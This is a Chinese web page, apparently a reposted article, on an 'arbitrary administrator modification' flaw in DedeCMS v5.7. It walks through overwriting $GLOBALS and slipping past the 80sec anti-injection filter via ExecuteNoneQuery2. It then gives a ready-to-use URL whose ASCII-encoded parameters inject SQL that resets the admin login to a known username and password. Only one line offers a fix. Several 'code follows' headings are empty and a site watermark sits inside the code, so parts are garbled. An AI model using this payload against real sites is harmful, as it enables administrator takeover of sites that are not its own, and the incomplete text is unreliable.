dedecms屏蔽规则(织梦dedecms修改任意管理员漏洞处理方法)
类别:CMS系统 浏览量:379
时间:2022-01-28 01:21:39 dedecms屏蔽规则
织梦dedecms修改任意管理员漏洞处理方法本文实例讲述了织梦dedecms修改任意管理员漏洞处理方法。分享给大家供大家参考。具体分析如下:
织梦DEDECMS是全国用到最多的cms系统了,正由于用得人多而且是开源的代码,所以分析人也多bug出现不少,根据小编总结出现bug大多是在变量上,这次又是全局变量$GLOBALS可以被任意修改导致的,下面来给各位演示这个bug与处理方法.
漏洞版本:dedecms v5.7
漏洞描述:起因是全局变量$GLOBALS可以被任意修改,以下举一例,代码如下:
if(isset($GLOBALS['arrs1']))
{
$v1 = $v2 = '';
for($i=0;isset($arrs1[$i]);$i++)
{
$v1 .= chr($arrs1[$i]);
}
for($i=0;isset($arrs2[$i]);$i++)
{
$v2 .= chr($arrs2[$i]); //解码ascii
}
$GLOBALS[$v1] .= $v2; www.zzvips.com//注意这里不是覆盖,是+
}
function SetQuery($sql)
{
$prefix="dede_";
$sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql);
$this->queryString = $sql;
}
下面说下绕过80sec防注入的方法.
同一文件中,有两个执行SQL的函数,ExecuteNoneQuery和ExecuteNoneQuery2
而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件,代码如下:
else if($open==1)
{
$id = isset($id) && is_numeric($id) ? $id : 0;
$link = base64_decode(urldecode($link));
$hash = md5($link);
//这里的#@_是可以控制的
$rs = $dsql->ExecuteNoneQuery2("UPDATE `dede_downloads` SET downloads = downloads + 1 WHERE hash='$hash' ");
if($rs <= 0) { $query = " INSERT INTO `dede_downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query);
}
header("location:$link");
exit();
}
构造SQL语句(提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc),代码如下:
完整SQL语句,代码如下:
测试方法,代码如下:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
如果不出问题,后台登录用户spider密码admin
安全建议:将应用到ExecuteNoneQuery2函数的文件均改为使用ExecuteNoneQuery函数并且根据情况,调试程序尽可能不要爆出绝对路径地址.
希望本文所述对大家的dedecms建站有所帮助。
您可能感兴趣
- dedecms使用教程(织梦dedecms软件频道判断是本站下载链接后再列出镜像的方法)
- dedecms 怎么设置栏目(dedecms如何实现tag标签伪静态的方法)
- dedecms标签怎么用(浅析DedeCMS GBK版安装sphinx全文索引无法查询无结果的解决方法)
- dedecms关闭站点(dedecms 会员登录或者退出直接跳转到首页的修改方法)
- dede采集规则(DEDECMS 5.7 采集规则无法导入的解决办法)
- 织梦dedecms建站详细流程(修改织梦dedecms后台默认admin账号的方法)
- dedecms使用教程(dedecms二级菜单中判断子菜单标签的使用方法)
- dedecms联动使用教程(dedecms联动类别的图文使用方法)
- dedecms默认水印(DEDECMS显示英文日期时间的方法)
- 如何修改dedecms(dedecms做英文站修改方法)
- dedecms搜索功能怎么设置详细(织梦dedecms文章列表页随机放入广告的方法)
- dedecms 产品缩略图(织梦DedeCms v5.6/5.7 新图集页面增加图片下载功能)
- dedecms调用点击数(织梦DEDECMS中显示复制地址,推荐给QQ/MSN上的好友的代码)
- dedecms系统更改(DEDECMS添加运行代码功能的FCKeditor编辑器修改方法)
- dedecms v5.7使用教程(织梦dedecms数据库类$dsql使用方法步骤)
- dedecms数据库优化(dedecms 安全设置终极技巧补充idc)
- 销 售 买 卖 你真的了解这四个字了吗(销售买)
- 谢娜是得罪快乐大本营造型师了吗 全场被黑化(谢娜是得罪快乐大本营造型师了吗)
- 前《iLOOK》时装总监 《快乐大本营》御用造型师上线(快乐大本营御用造型师上线)
- 释小龙晒杀青照片 多重身份惹观众期待(释小龙晒杀青照片)
- 《九牛之人降魔传》开机 演员祁高坤化身九牛之人除魔卫道(九牛之人降魔传开机)
- 王铲铲的致富之路无限金币卡法攻略教学(王铲铲的致富之路无限金币卡法攻略教学)
热门推荐
- vue的修饰符都有哪些(详解Vue的sync修饰符)
- 远程给docker容器执行命令(Docker命令让普通用户能够执行的实现)
- 还原NuGet程序包
- mysql单个表可以储存多少内容(浅谈mysql一张表到底能存多少数据)
- nodejs请求页面(node.js+postman实现模拟HTTP服务器与客户端交互)
- 腾讯云服务器操作系统怎么选(如何选择腾讯云服务器配置?)
- laravel自定义条件查询(解决laravel groupBy 对查询结果进行分组出现的问题)
- 云数据库navicat连不上(Navicat Premium15连接云服务器中的数据库问题及遇到坑)
- react基础知识入门(浅谈React 的引入)
- laravel设置跨域请求(解决laravel 出现ajax请求419unknown status的问题)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9